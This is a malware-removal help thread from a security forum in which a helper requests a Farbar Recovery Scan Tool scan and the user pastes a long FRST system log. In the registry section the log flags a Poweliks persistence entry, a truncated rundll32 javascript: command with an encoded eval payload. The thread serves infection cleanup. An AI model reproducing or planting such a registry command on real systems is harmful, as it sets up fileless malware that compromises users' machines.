Post-Run: 396,215,791,616 bytes free
.
- - End Of File - - D18CCF68C35EBC8098C95FBCEF988CED
A36C5E4F47E84449FF07ED3517B43A31


BC AdBot (Login to Remove)

 


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:01 AM

Posted 14 September 2014 - 07:00 PM

Hi there,

it indeed looks like Combofix wasn't able to remove the infection this time.
So let's get a FRST scan first:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 mpl006

mpl006
  • Topic Starter

  • Members
  • 9 posts
  • OFFLINE
  •  
  • Local time:08:01 PM

Posted 14 September 2014 - 07:55 PM

Thank you very much for the quick response.  I figured it would be a little while before I got one.  Here are the two logs:

 

FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-09-2014
Ran by Dale (administrator) on DIMENSION-E510 on 14-09-2014 19:02:27
Running from C:\Users\Dale\Desktop
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(ATI Technologies Inc.) C:\Windows\System32\Ati2evxx.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgwdsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Google Inc.) C:\Program Files\Google\Update\1.3.24.15\GoogleCrashHandler.exe
() C:\Program Files\Canon\IJPLM\ijplmsvc.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\VS7DEBUG\mdm.exe
(Nero AG) C:\Program Files\Common Files\Nero\Nero BackItUp 4\NBService.exe
(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files\AVG\AVG2014\avgui.exe
(AVG Secure Search) C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe
(Schneider Electric) C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe
() C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\loggingserver.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\tv_w32.exe
(Mozilla Corporation) C:\Program Files\Mozilla Firefox\plugin-container.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
(Adobe Systems, Inc.) C:\Windows\System32\Macromed\Flash\FlashPlayerPlugin_11_9_900_170.exe
(TeamViewer GmbH) C:\Users\Dale\AppData\Local\Temp\TeamViewer\Version9\TeamViewer_Desktop.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AVG_UI] => C:\Program Files\AVG\AVG2014\avgui.exe [5188112 2014-08-25] (AVG Technologies CZ, s.r.o.)
HKU\S-1-5-21-941127145-1180520044-1929224469-1000\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil32_11_9_900_170_Plugin.exe [839560 2014-01-08] (Adobe Systems Incorporated)
HKU\S-1-5-21-941127145-1180520044-1929224469-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
ShellIconOverlayIdentifiers: GDriveBlacklistedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedEditOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSharedViewOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncedOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
ShellIconOverlayIdentifiers: GDriveSyncingOverlay -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files\Google\Drive\googledrivesync32.dll (Google)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
SearchScopes: HKLM - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = http://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50aoldesktopie7
SearchScopes: HKCU - {95B7759C-8C7F-4BF1-B163-73684A933233} URL = http://isearch.avg.com/search?cid={21E441B3-EF26-436F-A6A1-95B7AB175FB8}&mid=a9a15af4a8a247d0815bd15a34568ce3-376f6faec36d28a09c55704a5acf6cec25c189f2&lang=en&ds=AVG&pr=fr&d=2012-03-25 12:31:25&v=15.3.0.11&pid=avg&sg=0&sap=dsp&q={searchTerms}
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: AVG Safe Search -> {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} -> C:\Program Files\AVG\AVG2012\avgssie.dll No File
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre6\bin\ssv.dll (Sun Microsystems, Inc.)
BHO: AVG Security Toolbar -> {95B7759C-8C7F-4BF1-B163-73684A933233} -> C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
Toolbar: HKLM - AVG Security Toolbar - {95B7759C-8C7F-4BF1-B163-73684A933233} - C:\Program Files\AVG Secure Search\18.1.9.799\AVG Secure Search_toolbar.dll (AVG Secure Search)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll (Microsoft Corporation)
Handler: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files\Intuit\QuickBooks 2009\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
Handler: linkscanner - {F274614C-63F8-47D5-A4D1-FBDDE494F8D1} - C:\Program Files\AVG\AVG2012\avgpp.dll No File
Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - C:\Program Files\Common Files\AVG Secure Search\ViProtocolInstaller\18.1.9\ViProtocol.dll (AVG Secure Search)
Winsock: Catalog5 07 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 208.180.42.68 208.180.42.100
 
FireFox:
========
FF ProfilePath: C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default
FF DefaultSearchEngine: Conduit Search
FF SelectedSearchEngine: Conduit Search
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @avg.com/AVG SiteSafety plugin,version=11.0.0.1,application/x-avg-sitesafety-plugin -> C:\Program Files\Common Files\AVG Secure Search\SiteSafetyInstaller\18.1.9\\npsitesafety.dll No File
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @Google.com/GoogleEarthPlugin -> C:\Program Files\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\plugin2\npjp2.dll (Sun Microsystems, Inc.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Experience Technology\npViewpoint.dll ()
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\avg-secure-search.xml
FF Extension: Firefox Old Version Update Hotfix - C:\Users\Dale\AppData\Roaming\Mozilla\Firefox\Profiles\pyqw91t4.default\Extensions\firefox-hotfix@mozilla.org.xpi [2014-08-22]
FF HKLM\...\Firefox\Extensions: [avg@toolbar] - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799
FF Extension: AVG Security Toolbar - C:\ProgramData\AVG Secure Search\FireFoxExt\18.1.9.799 [2014-08-25]
 
Chrome: 
=======
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}sugkey={google:suggestAPIKeyParameter}
CHR CustomProfile: C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-07-06]
CHR Extension: (Google Drive) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-07-06]
CHR Extension: (YouTube) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-07-06]
CHR Extension: (Google Search) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-07-06]
CHR Extension: (AVG Security Toolbar) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\ndibdjnfmopecpmkdieinmbadjfpblof [2013-07-06]
CHR Extension: (Gmail) - C:\Users\Dale\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-07-06]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AOL ACS; C:\Program Files\Common Files\AOL\ACS\AOLAcsd.exe [46640 2006-10-23] (AOL LLC)
R2 APC Data Service; C:\Program Files\APC\PowerChute Personal Edition\dataserv.exe [21880 2012-01-24] (Schneider Electric)
R2 APC UPS Service; C:\Program Files\APC\PowerChute Personal Edition\mainserv.exe [705912 2012-01-24] (Schneider Electric)
S2 AVGIDSAgent; C:\Program Files\AVG\AVG2014\avgidsagent.exe [3242000 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 avgwd; C:\Program Files\AVG\AVG2014\avgwdsvc.exe [289328 2014-08-25] (AVG Technologies CZ, s.r.o.)
R2 IJPLMSVC; C:\Program Files\Canon\IJPLM\IJPLMSVC.EXE [138192 2011-02-07] ()
R2 MDM; C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
R2 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2011-12-22] (Intuit) [File not signed]
S2 SDScannerService; C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
S2 SDUpdateService; C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
S2 SDWSCService; C:\Program Files\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 vToolbarUpdater18.1.9; C:\Program Files\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [1820184 2014-08-12] (AVG Secure Search)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R1 Avgdiskx; C:\Windows\System32\DRIVERS\avgdiskx.sys [121624 2014-06-30] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSDriver; C:\Windows\System32\DRIVERS\avgidsdriverx.sys [200984 2014-07-21] (AVG Technologies CZ, s.r.o.)
R0 AVGIDSHX; C:\Windows\System32\DRIVERS\avgidshx.sys [147736 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 AVGIDSShim; C:\Windows\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgldx86; C:\Windows\System32\DRIVERS\avgldx86.sys [188696 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avglogx; C:\Windows\System32\DRIVERS\avglogx.sys [241944 2014-06-17] (AVG Technologies CZ, s.r.o.)
R0 Avgmfx86; C:\Windows\System32\DRIVERS\avgmfx86.sys [98584 2014-08-06] (AVG Technologies CZ, s.r.o.)
R0 Avgrkx86; C:\Windows\System32\DRIVERS\avgrkx86.sys [27416 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 Avgtdix; C:\Windows\System32\DRIVERS\avgtdix.sys [197400 2014-06-17] (AVG Technologies CZ, s.r.o.)
R1 avgtp; C:\Windows\system32\drivers\avgtpx86.sys [42784 2014-08-12] (AVG Technologies)
R3 wanatw; C:\Windows\System32\DRIVERS\wanatw4.sys [33588 2006-11-29] (America Online, Inc.)
R3 catchme; \??\C:\Users\Dale\AppData\Local\Temp\catchme.sys [X]
S2 DgiVecp; \??\C:\Windows\system32\Drivers\DgiVecp.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-14 18:13 - 2014-09-14 18:13 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TeamViewer
2014-09-14 18:12 - 2014-09-14 18:12 - 04691456 _____ (TeamViewer) C:\Users\Dale\Downloads\TeamViewerQS_en.exe
2014-09-13 18:58 - 2014-09-13 18:58 - 00054720 _____ () C:\ComboFix.txt
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:47 - 2014-09-14 19:14 - 00014807 _____ () C:\Users\Dale\Desktop\FRST.txt
2014-09-13 11:47 - 2014-09-14 19:02 - 00000000 ____D () C:\FRST
2014-09-13 10:44 - 2011-06-26 01:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-13 10:44 - 2010-11-07 12:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-13 10:44 - 2009-04-19 23:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-13 10:44 - 2000-08-30 19:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:19 - 2014-09-13 18:58 - 00000000 ____D () C:\Qoobox
2014-09-13 10:19 - 2014-09-13 11:38 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 10:18 - 2014-09-13 02:20 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 10:18 - 2014-09-13 02:19 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:38 - 2014-09-13 01:50 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-13 01:34 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-12 19:00 - 2014-08-19 12:39 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-09-12 19:00 - 2014-08-18 17:26 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-09-12 19:00 - 2014-08-18 17:08 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-09-12 19:00 - 2014-08-18 16:57 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-09-12 19:00 - 2014-08-18 16:57 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-09-12 19:00 - 2014-08-18 16:46 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-09-12 19:00 - 2014-08-18 16:45 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-09-12 19:00 - 2014-08-18 16:44 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-09-12 19:00 - 2014-08-18 16:42 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-09-12 19:00 - 2014-08-18 16:39 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-09-12 19:00 - 2014-08-18 16:37 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-09-12 19:00 - 2014-08-18 16:36 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-09-12 19:00 - 2014-08-18 16:36 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-09-12 19:00 - 2014-08-18 16:35 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-09-12 19:00 - 2014-08-18 16:30 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-09-12 19:00 - 2014-08-18 16:27 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-09-12 19:00 - 2014-08-18 16:22 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-09-12 19:00 - 2014-08-18 16:19 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-09-12 19:00 - 2014-08-18 16:17 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-09-12 19:00 - 2014-08-18 16:15 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-09-12 19:00 - 2014-08-18 16:09 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-09-12 19:00 - 2014-08-18 16:08 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-09-12 19:00 - 2014-08-18 16:08 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-09-12 19:00 - 2014-08-18 16:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-09-12 19:00 - 2014-08-18 15:46 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-09-12 19:00 - 2014-08-18 15:38 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-09-12 19:00 - 2014-08-18 15:36 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-09-12 18:59 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 03:57 - 2014-07-06 20:40 - 01059840 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-09-12 03:57 - 2014-07-06 20:40 - 00550912 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-09-12 03:41 - 2014-08-01 06:35 - 00793600 _____ (Microsoft Corporation) C:\Windows\system32\TSWorkspace.dll
2014-09-12 00:48 - 2014-09-04 20:52 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-12 00:48 - 2014-09-04 20:47 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-08 09:30 - 2014-09-13 00:13 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-08 09:30 - 2014-09-13 00:13 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-04 11:33 - 2014-09-12 18:14 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-02 19:12 - 2014-09-02 21:16 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-08-28 00:19 - 2014-08-22 20:46 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-28 00:19 - 2014-08-22 19:42 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:43 - 2014-09-08 12:49 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:39 - 2014-08-24 09:45 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:36 - 2014-08-25 00:06 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:30 - 2014-08-24 09:31 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-23 08:14 - 2014-05-14 11:23 - 01973728 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2014-08-23 08:14 - 2014-05-14 11:23 - 00054240 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2014-08-23 08:14 - 2014-05-14 11:23 - 00045536 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2014-08-23 08:14 - 2014-05-14 11:17 - 02425856 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00581600 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2014-08-23 08:13 - 2014-05-14 11:23 - 00036320 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2014-08-23 08:13 - 2014-05-14 11:17 - 00092672 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:38 - 2014-09-12 23:23 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2014-08-22 15:39 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:38 - 2013-09-20 10:49 - 00018968 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean.exe
2014-08-22 15:33 - 2014-08-22 15:35 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-19 01:09 - 2014-05-14 09:23 - 00179656 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2014-08-19 01:09 - 2014-05-14 09:17 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2014-08-16 18:18 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-08-16 18:18 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-08-16 18:18 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-08-15 21:38 - 2014-07-13 20:42 - 00654336 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2014-08-15 21:38 - 2014-06-15 20:44 - 00730048 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys
2014-08-15 21:38 - 2014-06-15 20:44 - 00219072 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2014-08-15 21:38 - 2014-06-15 20:40 - 00107520 _____ (Microsoft Corporation) C:\Windows\system32\cdd.dll
2014-08-15 21:36 - 2014-07-15 21:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-08-15 21:36 - 2014-06-03 04:30 - 00101824 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-08-15 21:36 - 2014-06-03 04:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-08-15 21:36 - 2014-06-03 04:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
